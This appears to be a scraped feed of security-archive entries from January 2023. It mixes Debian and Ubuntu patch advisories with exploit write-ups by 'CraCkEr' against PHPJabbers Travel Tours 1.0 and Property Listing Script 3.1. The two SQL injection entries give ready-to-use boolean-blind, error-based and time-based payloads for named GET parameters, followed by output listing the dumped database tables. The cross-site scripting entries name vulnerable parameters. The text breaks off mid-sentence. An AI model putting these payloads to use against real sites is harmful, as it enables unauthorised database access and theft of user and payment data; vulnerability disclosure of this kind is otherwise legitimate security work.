Debian Linux Security Advisory 5331-1 - Several vulnerabilities have been discovered in the OpenJDK Java runtime, which may result in denial of service or spoofing.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5331-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
January 28, 2023                      https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : openjdk-11  
CVE ID         : CVE-2022-21619 CVE-2022-21624 CVE-2022-21626 CVE-2022-21628   
                 CVE-2022-39399 CVE-2023-21835 CVE-2023-21843

Several vulnerabilities have been discovered in the OpenJDK Java runtime,  
which may result in denial of service or spoofing.

For the stable distribution (bullseye), these problems have been fixed in  
version 11.0.18+10-1~deb11u1.

We recommend that you upgrade your openjdk-11 packages.

For the detailed security status of openjdk-11 please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/openjdk-11

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmPVXJgACgkQEMKTtsN8  
TjaDFA//fTs6b0krISKRClpErRG2nD2pvTm4uvGwYuRD6hZ+IZS+IXd6/sneGnTE  
KwmYRpzdgX8Kowx036816UXyBY62iQDy/sX7hD76MGh7dI4xKhZzsbLxGlaQICIC  
HEuV3i7SSeZ8Qlgzo0s1S+MYaiEU3Uj7w/hgPdw840NGgMJnrl5Xl9R2ftTDES/h  
uXErDccwvmi+zYY64mH44Utrp1aU7VTWYBK33kkGDgIC12qRk5Vtw1BcPTFHZ37g  
98rVHDZ9XikCBC+SrBDLC3wVB+Fj+YFhgAR3GYgmkMxcTDU6Awh10tpJc2d2XpQS  
QbQYNVFYk9y85wZnyvJ8r8BUIr1UPgp04RjjMyrpmnMMkAp0cXXw07gmllqzWB98  
A/3GpXwlUtvZl8BSdwD3hawCfGUfUeISZO3NeLr0NjDfj4GQuVFmhsI13TGJV8ip  
BdzAaREG3UwxS1DmQH3dHQkZ/tOaouHYrSczympUfjVTwsCaSqHBdtlYesC0t1By  
I5F3FLBqdLy2Gs9KLn8ef8BN2ecc3bMTz4wrhuKYuqa0qsKmyRLl58XyJ+8NsFSf  
JUxXn8B+6kI+OiDJSITUr87+YGGOdsY/WvcVOeL+fXcQpSV/3S0KrTRkZ/xhUjhJ  
lngIcYUBe4/65INSpXCFb4LSKC6N5JKH3ro7iUN589gaOSvRPE0=  
=HU+A  
-----END PGP SIGNATURE-----

Debian Security Advisory 5331-1

PHPJabbers Travel Tours Script version 1.0 suffers from a remote SQL injection vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : PHPJabbers.com                                                             ││  Vendor   : PHPJabbers                                                                 ││  Software : PHPJabbers Travel Tours Script 1.0                                         ││  Vuln Type: SQL Injection                                                              ││  Impact   : Database Access                                                            ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│ Release Notes:                                                                         ││ ═════════════                                                                          ││                                                                                        ││ SQL injection attacks can allow unauthorized access to sensitive data, modification of ││ data and crash the application or make it unavailable, leading to lost revenue and     ││ damage to a company's reputation.                                                      ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /front.phpfront.php?controller=pjListings&action=pjActionListings&listing_search=1&view=list&season=1&price_from=60&price_to=1500&rating_from=[SQLI]&rating_to=[SQLI]GET parameter 'rating_from' is vulnerable to SQLI---Parameter: rating_from (GET)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: controller=pjListings&action=pjActionListings&listing_search=1&view=list&season=1&price_from=60&price_to=1500&rating_from=2) AND 3442=3442 AND (7236=7236&rating_to=5    Type: error-based    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)    Payload: controller=pjListings&action=pjActionListings&listing_search=1&view=list&season=1&price_from=60&price_to=1500&rating_from=2) AND GTID_SUBSET(CONCAT(0x71626b7a71,(SELECT (ELT(9974=9974,1))),0x71626b7871),9974) AND (8540=8540&rating_to=5    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: controller=pjListings&action=pjActionListings&listing_search=1&view=list&season=1&price_from=60&price_to=1500&rating_from=2) AND (SELECT 2396 FROM (SELECT(SLEEP(5)))lmil) AND (1063=1063&rating_to=5---GET parameter 'rating_to' is vulnerable to SQLI---Parameter: rating_to (GET)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: controller=pjListings&action=pjActionListings&listing_search=1&view=list&season=1&price_from=60&price_to=1500&rating_from=2&rating_to=5) AND 3784=3784 AND (4445=4445    Type: error-based    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)    Payload: controller=pjListings&action=pjActionListings&listing_search=1&view=list&season=1&price_from=60&price_to=1500&rating_from=2&rating_to=5) AND GTID_SUBSET(CONCAT(0x71626b7a71,(SELECT (ELT(9427=9427,1))),0x71626b7871),9427) AND (7794=7794    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: controller=pjListings&action=pjActionListings&listing_search=1&view=list&season=1&price_from=60&price_to=1500&rating_from=2&rating_to=5) AND (SELECT 9220 FROM (SELECT(SLEEP(5)))QqcU) AND (6313=6313---[+] Starting the Attackfetching tables for database: '********_****_***'Database: ********_****_***[52 tables]+------------------------------------------+| vacationpackages_comments                || vacationpackages_countries               || vacationpackages_enquiries               || vacationpackages_features                || vacationpackages_fields                  || vacationpackages_listings_availabilities || vacationpackages_listings_features       || vacationpackages_listings                || vacationpackages_multi_lang              || vacationpackages_notifications           || vacationpackages_options                 || vacationpackages_payments                || vacationpackages_periods                 || vacationpackages_plugin_country          || vacationpackages_plugin_galleries_set    || vacationpackages_plugin_gallery          || vacationpackages_plugin_locale_languages || vacationpackages_plugin_locale           || vacationpackages_plugin_log_config       || vacationpackages_plugin_log              || vacationpackages_plugin_one_admin        || vacationpackages_plugin_paypal           || vacationpackages_prices                  || vacationpackages_roles                   || vacationpackages_types                   || vacationpackages_users                   || vacationpackages_comments                || vacationpackages_countries               || vacationpackages_enquiries               || vacationpackages_features                || vacationpackages_fields                  || vacationpackages_listings                || vacationpackages_listings_availabilities || vacationpackages_listings_features       || vacationpackages_multi_lang              || vacationpackages_notifications           || vacationpackages_options                 || vacationpackages_payments                || vacationpackages_periods                 || vacationpackages_plugin_country          || vacationpackages_plugin_galleries_set    || vacationpackages_plugin_gallery          || vacationpackages_plugin_locale           || vacationpackages_plugin_locale_languages || vacationpackages_plugin_log              || vacationpackages_plugin_log_config       || vacationpackages_plugin_one_admin        || vacationpackages_plugin_paypal           || vacationpackages_prices                  || vacationpackages_roles                   || vacationpackages_types                   || vacationpackages_users                   |+------------------------------------------+[-] Done

PHPJabbers Travel Tours Script 1.0 SQL Injection

Ubuntu Security Notice 5831-1 - Kyle Zeng discovered that the sysctl implementation in the Linux kernel contained a stack-based buffer overflow. A local attacker could use this to cause a denial of service or execute arbitrary code. Tamás Koczka discovered that the Bluetooth L2CAP handshake implementation in the Linux kernel contained multiple use-after-free vulnerabilities. A physically proximate attacker could use this to cause a denial of service or possibly execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-5831-1  
January 27, 2023

linux-azure-fde vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS

Summary:

Several security issues were fixed in the Linux kernel.

Software Description:  
- linux-azure-fde: Linux kernel for Microsoft Azure CVM cloud systems

Details:

Kyle Zeng discovered that the sysctl implementation in the Linux kernel  
contained a stack-based buffer overflow. A local attacker could use this to  
cause a denial of service (system crash) or execute arbitrary code.  
(CVE-2022-4378)

Tamás Koczka discovered that the Bluetooth L2CAP handshake implementation  
in the Linux kernel contained multiple use-after-free vulnerabilities. A  
physically proximate attacker could use this to cause a denial of service  
(system crash) or possibly execute arbitrary code. (CVE-2022-42896)

It was discovered that the Xen netback driver in the Linux kernel did not  
properly handle packets structured in certain ways. An attacker in a guest  
VM could possibly use this to cause a denial of service (host NIC  
availability). (CVE-2022-3643)

It was discovered that an integer overflow vulnerability existed in the  
Bluetooth subsystem in the Linux kernel. A physically proximate attacker  
could use this to cause a denial of service (system crash).  
(CVE-2022-45934)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS:  
   linux-image-5.15.0-1031-azure-fde  5.15.0-1031.38.1  
   linux-image-azure-fde           5.15.0.1031.38.8

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
   https://ubuntu.com/security/notices/USN-5831-1  
   CVE-2022-3643, CVE-2022-42896, CVE-2022-4378, CVE-2022-45934

Package Information:  
   https://launchpad.net/ubuntu/+source/linux-azure-fde/5.15.0-1031.38.1

Ubuntu Security Notice USN-5831-1

PHPJabbers Travel Tours Script version 1.0 suffers from a cross site scripting vulnerability.

┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
││                                     C r a C k E r                                    ┌┘  
┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││  
└───────────────────────────────────────────────────────────────────────────────────────┘┘

 ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘                                  [ Vulnerability ]                                   ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
:  Author   : CraCkEr                                                                    :  
│  Website  : PHPJabbers.com                                                             │  
│  Vendor   : PHPJabbers                                                                 │  
│  Software : PHPJabbers Travel Tours Script 1.0                                         │  
│  Vuln Type: Reflected XSS                                                              │  
│  Impact   : Manipulate the content of the site                                         │  
│                                                                                        │  
│────────────────────────────────────────────────────────────────────────────────────────│  
│                                                                                       ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
:                                                                                        :  
│  Release Notes:                                                                        │  
│  ═════════════                                                                         │  
│  The attacker can send to victim a link containing a malicious URL in an email or      │  
│  instant message can perform a wide variety of actions, such as stealing the victim's  │  
│  session token or login credentials                                                    │  
│                                                                                        │  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘                                                                                      ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Greets:

    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL   

         CryptoJob (Twitter) twitter.com/CryptozJob

     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘                                    © CraCkEr 2023                                    ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Path: /front.php

/front.php?controller=pjListings&action=pjActionListings&listing_search=[XSS]&view=[XSS]&season=[XSS]&price_from=[XSS]&price_to=[XSS]&rating_from=[XSS]&rating_to=[XSS]

/front.php?controller=pjListings&action=pjActionRegister&view=[XSS]&direction=[XSS]&listing_search=[XSS]

/front.php?controller=pjListings&action=pjActionListings&listing_search=[XSS]&view=[XSS]&season=[XSS]&pjPage=[XSS]

GET parameter 'listing_search' is vulnerable to XSS

GET parameter 'view' is vulnerable to XSS

GET parameter 'season' is vulnerable to XSS

GET parameter 'direction' is vulnerable to XSS

GET parameter 'price_from' is vulnerable to XSS

GET parameter 'price_to' is vulnerable to XSS

GET parameter 'pjPage' is vulnerable to XSS

GET parameter 'rating_from' is vulnerable to XSS

GET parameter 'rating_to' is vulnerable to XSS

URL parameter to XSS

/front.php/[XSS]?controller=pjListings&action=pjActionRegister&view=[XSS]t&direction=[XSS]&listing_search=[XSS]

[-] Done

PHPJabbers Travel Tours Script 1.0 Cross Site Scripting

Debian Linux Security Advisory 5330-1 - Two vulnerabilities were discovered in Curl, an easy-to-use client-side URL transfer library, which could result in denial of service or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5330-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffJanuary 27, 2023                      https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : curlCVE ID         : CVE-2022-32221 CVE-2022-43552Two vulnerabilities were discovered in Curl, an easy-to-use client-sideURL transfer library, which could result in denial of service orinformation disclosure.For the stable distribution (bullseye), these problems have been fixed inversion 7.74.0-1.3+deb11u5. This update also revises the fix forCVE-2022-27774 released in DSA-5197-1.We recommend that you upgrade your curl packages.For the detailed security status of curl please refer toits security tracker page at:https://security-tracker.debian.org/tracker/curlFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmPUCUkACgkQEMKTtsN8TjaA3g/8DBSNCu0gAsoqGfSGx42C4GDMKJBZKiW92bIVKuuJ+1Pq1VQ6msVdmOgCL/i1YFwFaxqPPQWnQQWBDNXn1oYpkVXop+Yq3ETsiX6bpF0+TCXBZRY9KsuSYyzniky7f1ueJAFjqTHWdJ/J5nfSrYSdQ/UIDNKsO2dFTD3uq1W5+qStVAdxnSOh9pMY5XgMh27urtZttTdyL+no+lRkK2jS2Ru8SgMCCmGsfUn7gFtxHn8Aqd2WEQQ9AsmgJkBjvZI2hhHqTBc96ZiTYCH6gjQHyGnRrRaZe0nZWyeSFJ8N8mblD1xequma5nPlWy5t0kKcOMVr6HvaNDbHLd51WoO9e0htjBmZXdmeEeudvkGKg00d1cPlwWmihegeuaiMHYUR/aCW1wko6FNsJ2yOZDY5iGjNNZHydrokcfB8DV/QGlFLFRXusUdX51bfylMCx1vddLTB5NQeQ7q0+eB2Rq5kM0KqdX1gsuq9id5NGSeZR/yjNPPEHbJKu2RFRridvY1H6kn2mB7YGYDGLjT/hYkoEXrBcrzPXEpBwKzsu4ih1C9eFW8DhK+iPD/U765dRV/UWIyk8uJHFmqfd4OqvG0ssVxYW5SraeOCVhToiA/vyB1mIOhYMWAitssG5xQ/DH8+4NQkGAc2Rmh4aQ6hB7QZst1+Ztqgpkcr1fods9de51k==EDu7-----END PGP SIGNATURE-----

Debian Security Advisory 5330-1

PHPJabbers Property Listing Script version 3.1 suffers from a remote SQL injection vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : PHPJabbers.com                                                             ││  Vendor   : PHPJabbers                                                                 ││  Software : PHPJabbers Property Listing Script 3.1                                     ││  Vuln Type: SQL Injection                                                              ││  Impact   : Database Access                                                            ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│ Release Notes:                                                                         ││ ═════════════                                                                          ││                                                                                        ││ SQL injection attacks can allow unauthorized access to sensitive data, modification of ││ data and crash the application or make it unavailable, leading to lost revenue and     ││ damage to a company's reputation.                                                      ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: preview.php/preview.php?controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=[SQLI]&min_bedrooms=[SQLI]&max_bedrooms=[SQLI]&min_bathrooms=[SQLI]&max_bathrooms=[SQLI]&min_floor_area=11&max_floor_area=33GET parameter 'feature_id' is vulnerable to SQLI---Parameter: feature_id (GET)    Type: boolean-based blind    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause    Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1' RLIKE (SELECT (CASE WHEN (2062=2062) THEN 1 ELSE 0x28 END)) AND 'NbjG'='NbjG&min_bedrooms=1&max_bedrooms=2&min_bathrooms=2&max_bathrooms=3&min_floor_area=11&max_floor_area=33    Type: error-based    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)    Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1' AND GTID_SUBSET(CONCAT(0x717a706b71,(SELECT (ELT(2733=2733,1))),0x716b707171),2733) AND 'iWla'='iWla&min_bedrooms=1&max_bedrooms=2&min_bathrooms=2&max_bathrooms=3&min_floor_area=11&max_floor_area=33    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1' AND (SELECT 3509 FROM (SELECT(SLEEP(5)))pnEw) AND 'UOAT'='UOAT&min_bedrooms=1&max_bedrooms=2&min_bathrooms=2&max_bathrooms=3&min_floor_area=11&max_floor_area=33---GET parameter 'min_bedrooms' is vulnerable to SQLI---Parameter: min_bedrooms (GET)    Type: boolean-based blind    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause    Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1) RLIKE (SELECT (CASE WHEN (7879=7879) THEN 1 ELSE 0x28 END))-- HIzI&max_bedrooms=2&min_bathrooms=2&max_bathrooms=3&min_floor_area=11&max_floor_area=33    Type: error-based    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)    Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1) AND GTID_SUBSET(CONCAT(0x717a706b71,(SELECT (ELT(2095=2095,1))),0x716b707171),2095)-- bfcY&max_bedrooms=2&min_bathrooms=2&max_bathrooms=3&min_floor_area=11&max_floor_area=33    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1) AND (SELECT 9649 FROM (SELECT(SLEEP(5)))cOvl)-- zdSI&max_bedrooms=2&min_bathrooms=2&max_bathrooms=3&min_floor_area=11&max_floor_area=33---GET parameter 'max_bedrooms' is vulnerable to SQLI---Parameter: max_bedrooms (GET)    Type: boolean-based blind    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause    Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1&max_bedrooms=2) RLIKE (SELECT (CASE WHEN (6630=6630) THEN 2 ELSE 0x28 END))-- gEsM&min_bathrooms=2&max_bathrooms=3&min_floor_area=11&max_floor_area=33    Type: error-based    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)    Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1&max_bedrooms=2) AND GTID_SUBSET(CONCAT(0x717a706b71,(SELECT (ELT(9738=9738,1))),0x716b707171),9738)-- jXwM&min_bathrooms=2&max_bathrooms=3&min_floor_area=11&max_floor_area=33    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1&max_bedrooms=2) AND (SELECT 3446 FROM (SELECT(SLEEP(5)))VCFX)-- cQSs&min_bathrooms=2&max_bathrooms=3&min_floor_area=11&max_floor_area=33---GET parameter 'min_bathrooms' is vulnerable to SQLI---Parameter: min_bathrooms (GET)    Type: boolean-based blind    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause    Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1&max_bedrooms=2&min_bathrooms=2) RLIKE (SELECT (CASE WHEN (2227=2227) THEN 2 ELSE 0x28 END))-- lmwd&max_bathrooms=3&min_floor_area=11&max_floor_area=33    Type: error-based    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)    Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1&max_bedrooms=2&min_bathrooms=2) AND GTID_SUBSET(CONCAT(0x717a706b71,(SELECT (ELT(4352=4352,1))),0x716b707171),4352)-- OidJ&max_bathrooms=3&min_floor_area=11&max_floor_area=33    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1&max_bedrooms=2&min_bathrooms=2) AND (SELECT 6082 FROM (SELECT(SLEEP(5)))PGLl)-- mBCY&max_bathrooms=3&min_floor_area=11&max_floor_area=33---GET parameter 'max_bathrooms' is vulnerable to SQLI---Parameter: max_bathrooms (GET)    Type: boolean-based blind    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause    Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1&max_bedrooms=2&min_bathrooms=2&max_bathrooms=3) RLIKE (SELECT (CASE WHEN (9932=9932) THEN 3 ELSE 0x28 END))-- GPVf&min_floor_area=11&max_floor_area=33    Type: error-based    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)    Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1&max_bedrooms=2&min_bathrooms=2&max_bathrooms=3) AND GTID_SUBSET(CONCAT(0x717a706b71,(SELECT (ELT(3098=3098,1))),0x716b707171),3098)-- hFHq&min_floor_area=11&max_floor_area=33    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1&max_bedrooms=2&min_bathrooms=2&max_bathrooms=3) AND (SELECT 4637 FROM (SELECT(SLEEP(5)))iqxa)-- IvPE&min_floor_area=11&max_floor_area=33---[+] Starting the Attackfetching tables for database: '********_****_***'Database: ********_****_***[66 tables]+------------------------------------------+| property_listing_features                || property_listing_fields                  || property_listing_multi_lang              || property_listing_options                 || property_listing_passwords               || property_listing_payments                || property_listing_periods                 || property_listing_plugin_country          || property_listing_plugin_galleries_set    || property_listing_plugin_gallery          || property_listing_plugin_locale_languages || property_listing_plugin_locale           || property_listing_plugin_log_config       || property_listing_plugin_log              || property_listing_plugin_one_admin        || property_listing_plugin_paypal           || property_listing_plugin_sms              || property_listing_properties_features     || property_listing_properties              || property_listing_roles                   || property_listing_types                   || property_listing_users                   || property_listing_features                || property_listing_fields                  || property_listing_multi_lang              || property_listing_options                 || property_listing_passwords               || property_listing_payments                || property_listing_periods                 || property_listing_plugin_country          || property_listing_plugin_galleries_set    || property_listing_plugin_gallery          || property_listing_plugin_locale_languages || property_listing_plugin_locale           || property_listing_plugin_log_config       || property_listing_plugin_log              || property_listing_plugin_one_admin        || property_listing_plugin_paypal           || property_listing_plugin_sms              || property_listing_properties_features     || property_listing_properties              || property_listing_roles                   || property_listing_types                   || property_listing_users                   || property_listing_features                || property_listing_fields                  || property_listing_multi_lang              || property_listing_options                 || property_listing_passwords               || property_listing_payments                || property_listing_periods                 || property_listing_plugin_country          || property_listing_plugin_galleries_set    || property_listing_plugin_gallery          || property_listing_plugin_locale           || property_listing_plugin_locale_languages || property_listing_plugin_log              || property_listing_plugin_log_config       || property_listing_plugin_one_admin        || property_listing_plugin_paypal           || property_listing_plugin_sms              || property_listing_properties              || property_listing_properties_features     || property_listing_roles                   || property_listing_types                   || property_listing_users                   |+------------------------------------------+[-] Done

PHPJabbers Property Listing Script 3.1 SQL Injection

PHPJabbers Property Listing Script version 3.1 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : PHPJabbers.com                                                             ││  Vendor   : PHPJabbers                                                                 ││  Software : PHPJabbers Property Listing Script 3.1                                     ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /preview.phpMethod: GET/preview.php?controller=pjListings&action=pjActionProperties&listing_search=1&for=[XSS]&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=[XSS]&max_bedrooms=[XSS]&min_bathrooms=[XSS]&max_bathrooms=[XSS]&min_floor_area=11&max_floor_area=33URL parameter 'for' is vulnerable to XSSURL parameter 'min_bedrooms' is vulnerable to XSSURL parameter 'max_bedrooms' is vulnerable to XSSURL parameter 'min_bathrooms' is vulnerable to XSSURL parameter 'max_bathrooms' is vulnerable to XSS[-] Done

PHPJabbers Property Listing Script 3.1 Cross Site Scripting

Ubuntu Security Notice 5830-1 - It was discovered that the NFSD implementation in the Linux kernel did not properly handle some RPC messages, leading to a buffer overflow. A remote attacker could use this to cause a denial of service or possibly execute arbitrary code. Tamás Koczka discovered that the Bluetooth L2CAP handshake implementation in the Linux kernel contained multiple use-after-free vulnerabilities. A physically proximate attacker could use this to cause a denial of service or possibly execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-5830-1  
January 27, 2023

linux-azure, linux-azure-5.4, linux-raspi2 vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS

Summary:

Several security issues were fixed in the Linux kernel.

Software Description:  
- linux-azure: Linux kernel for Microsoft Azure Cloud systems  
- linux-azure-5.4: Linux kernel for Microsoft Azure cloud systems  
- linux-raspi2: Linux kernel for Raspberry Pi systems

Details:

It was discovered that the NFSD implementation in the Linux kernel did not  
properly handle some RPC messages, leading to a buffer overflow. A remote  
attacker could use this to cause a denial of service (system crash) or  
possibly execute arbitrary code. (CVE-2022-43945)

Tamás Koczka discovered that the Bluetooth L2CAP handshake implementation  
in the Linux kernel contained multiple use-after-free vulnerabilities. A  
physically proximate attacker could use this to cause a denial of service  
(system crash) or possibly execute arbitrary code. (CVE-2022-42896)

It was discovered that the Xen netback driver in the Linux kernel did not  
properly handle packets structured in certain ways. An attacker in a guest  
